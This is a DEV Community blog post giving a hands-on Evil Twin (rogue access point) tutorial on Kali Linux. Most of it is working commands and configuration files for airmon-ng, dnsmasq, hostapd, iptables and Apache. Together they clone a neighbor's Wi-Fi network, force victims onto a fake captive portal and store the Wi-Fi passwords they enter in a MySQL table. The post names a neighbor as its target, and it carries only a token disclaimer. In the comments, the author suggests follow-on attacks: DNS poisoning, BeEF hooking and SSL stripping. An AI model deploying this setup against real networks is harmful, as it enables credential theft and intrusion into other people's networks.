DEV Community

Cover image for Evil Twin Attack Example on Kali Linux
Thanos Stantzouris
Thanos Stantzouris

Posted on • Originally published at sudorealm.com

Evil Twin Attack Example on Kali Linux

Hello to all hackers, coders, designers, and overall tech lovers! My name is Thanos and I am a web developer by day and a hacker by night. These two crafts together, like the perfect fusion of Goten and Trunks, have given birth to a beautiful offspring of the well-known phishing attack named Evil Twin, or Rogue Access Point.

Let's dive in! Ready? GO!

Gotenks Fusion Ritual

Hol'Up!

Hacking without permission is a criminal offense. These tutorials and write-ups are for educational purposes only.
Anyway... take a look at that GitHub repo: AnonSurf 😏Thank me later.

Note: This post is an original 15min read. You can find the entire, full of details, post on my Blog Sudorealm.

Preparing the Attack

For this attack, we mostly need:

  • A Laptop or PC with Kali Linux in it... Somehow! Many are the ways of the force.
  • The mighty Alfa Wireless WiFi network Adapter card
  • Aircrack-n suite, for monitoring network traffic around us.
  • hostapd, software that lets us make our wireless card broadcast Access Point signals.
  • dnsmasq, Resolve DNS requests from or to a machine, Act as a DHCP server to allocate IP Addresses to the clients.
  • iptables, Provide users with internet access, forward traffic from etho to the wlan0mon interface.
  • Captive Portal Website, A web interface that will pop up when victim clicks its way into our Access Point.
  • MySQL, Save the captured credentials to DB.
  • apache2, Local Server for easy peasy lemon squeezy instant hosting.
  • Patience and a clear mind. If you forget to bring this into your game, you are doomed.

Code and Lines and Lines of Code

Always start with an apt-get update

Install DNSmasq

apt-get install dnsmasq-y
Enter fullscreen mode Exit fullscreen mode

Check or install hostapd

hostapd -h //To check if you have it installed

apt-get install hostapd //to install it
Enter fullscreen mode Exit fullscreen mode

Wireless Adapter on Monitor mode

airmon-ng start wlan0
Enter fullscreen mode Exit fullscreen mode

Setup DNSmasq conf

create a file named dnsmasq.conf and place inside the following:

#Set the wifi interface
interface=wlan0mon

#Set the IP range that can be given to clients
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,8h

#Set the gateway IP address
dhcp-option=3,10.0.0.1

#Set DNS server address
dhcp-option=6,10.0.0.1

#Set Server
server=8.8.8.8

#logs
log-queries
log-dhcp

#Redirect all requests to 10.0.0.1
address=/#/10.0.0.1
Enter fullscreen mode Exit fullscreen mode

Setup hostapd conf

Create a new file named hostapd.conf and write:

interface=wlan0mon
driver=nl80211
ssid=neighborAP
hw_mode=g
channel=8
macaddr_acl=0
ignore_broadcast_ssid=0
Enter fullscreen mode Exit fullscreen mode

To find the name of your surrounding APs and the channels that they broadcast to run:

airodump-ng wlan0mon
Enter fullscreen mode Exit fullscreen mode

Setup iptables rules

Create a new file named iptablesRules.sh

iptables --flush
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE 
iptables --append FORWARD --in-interface wlan0mon -j ACCEPT 
iptables -t nat -A POSTROUTING -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
Enter fullscreen mode Exit fullscreen mode

You will need to chmod +x to be able to run in from a terminal.

Setup Apache2 Rewrite Rules

We need to add a few lines to our apache2 server configuration settings in order to make the captive portal pop up whenever the victim clicks on the access point!

To do so, type: gedit /etc/apache2/sites-enabled/000-default.conf

</VirtualHost> //Already exists

<Directory "/var/www/html">
    RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
    RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^(.*)$ / [L,QSA]
</Directory>
Enter fullscreen mode Exit fullscreen mode

Copy and paste the chunk of code under the line of your apache2 configuration file!
After doing so, check if your apache2 rewrite module is enabled.

a2enmod rewrite
Enter fullscreen mode Exit fullscreen mode

If it is, it will tell you so!

Setting up code for Captive Portal

Now, this section is tricky because it depends on your neighbor, and specifically on which internet provider he/she uses.
Mine uses Cosmote, so I had to code something to grab his attention.

On your terminal window:

Now paste the contents of evilTwin Folder to HTML directory.

Start the Apache2 Web Server

service apache2 start
Enter fullscreen mode Exit fullscreen mode

Captive Portal for credential theft

So Far, So Good! But we need to make the webpage to store credentials to Database, which is the next step!

Setting up MySQL Database

If you open the dbconnect.php file on my repo, the following lines of code are the settings needed to create a successful connection with a Database.

//Database Connection Setup!

$host="localhost";
$username="dodgers";
$pass="duck";
$dbname="eviltwin";
$tbl_name="wpa_keys";

       ___
      /]_/
     |\/|.--/'-.
     \|/:o /  /\    ._,
        \_/_.'0/    _|_
         \____]] (>[___]=]]]===
         /    \___/P{]
      __//    /----\/
     (_[-'\__/_
         / | | \
        '=='='=='
       ____||||___
      (_""_/ \_""_)

Of the 24 and 1 half century
Enter fullscreen mode Exit fullscreen mode

Get ready for some Code spraying

  • Start MySQL servicee
root@kali:~# service mysql start
root@kali:~# mysql -u root -p 
Enter password: 

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 38
Server version: 10.3.24-MariaDB-2 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
Enter fullscreen mode Exit fullscreen mode

There is no password, just press enter. 😁

  • Create your Database
MariaDB [(none)]> create database eviltwin;
Query OK, 1 row affected (0.000 sec)

MariaDB [(none)]> use eviltwin;
Database changed

MariaDB [eviltwin]>
Enter fullscreen mode Exit fullscreen mode
  • Create a new user and grant him all privileges for the DB
MariaDB [(none)]> create user dodgers@localhost identified by 'duck';
Query OK, 0 rows affected (0.000 sec)

MariaDB [(none)]> grant all privileges on eviltwin.* to 'dodgers'@'localhost';
Query OK, 0 rows affected (0.000 sec)
Enter fullscreen mode Exit fullscreen mode
  • Create the table
MariaDB [eviltwin]> create table wpa_keys(password1 varchar(32), password2 varchar(32));
Query OK, 0 rows affected (0.015 sec)

MariaDB [eviltwin]> show tables;
+--------------------------+
| Hidden_NSA_Exploits      |
+--------------------------+
| s3cretsSn0wdendoesntKnow |
+--------------------------+
| wpa_keys                 |
+--------------------------+
Enter fullscreen mode Exit fullscreen mode

While you are in MariaDB you can also run raw SQL commands to do all kinds of stuff!

MariaDB [eviltwin]> insert into wpa_keys(password1, password2) values ("p@s$w0rd!@#", "p@s$w0rd!@#");
Query OK, 1 row affected (0.003 sec)

MariaDB [eviltwin]> select * from wpa_keys;
+-------------+-------------+
| password1   | password2   |
+-------------+-------------+
| p@s$w0rd!@# | p@s$w0rd!@# |
+-------------+-------------+
1 row in set (0.000 sec)
Enter fullscreen mode Exit fullscreen mode

Here we added a set of passwords and then we saw what's inside the table wpa_keys. Pretty cool stuff right? Without even a sign of GUI.

Now you should have a cool Captive Portal up and running with no problems whatsoever, Only thing remaining to do is, D E P L O Y

You can continue reading about the Deployment Phase on Sudorealm.com!
BUT WAIT Since you are about to dive into deep hacking waters, you should go in with style! 🎡Best Hacking Anthem Everrrrrr🎡

Thank you for reading 🍻

Super Sayans SWAG

Shoutouts

Twitter: @DevThanos

Top comments (2)

Collapse
 
vupt98 profile image
vupt-98

Hi. I want to ask if after the victim clicks on the fake network, the victim can access the internet, and is automatically redirected. I mean what happens after the victim clicks on the fake web and fills in the information

Collapse
 
athanstan profile image
Thanos Stantzouris

That's a Good question.
After the victim fills in the information then you dont want him to continue on that network. You want to infiltrate his/hers ;)

After you have successfully connected to your victims network then you can pretty much do a number of things... Monitor the traffic, DNS poisoning and redirection to beef hooked websites, drop the SSL Certifications and sniff clear text passwords... Not to give you ideas or anything :P Your imagination can go wild my friend!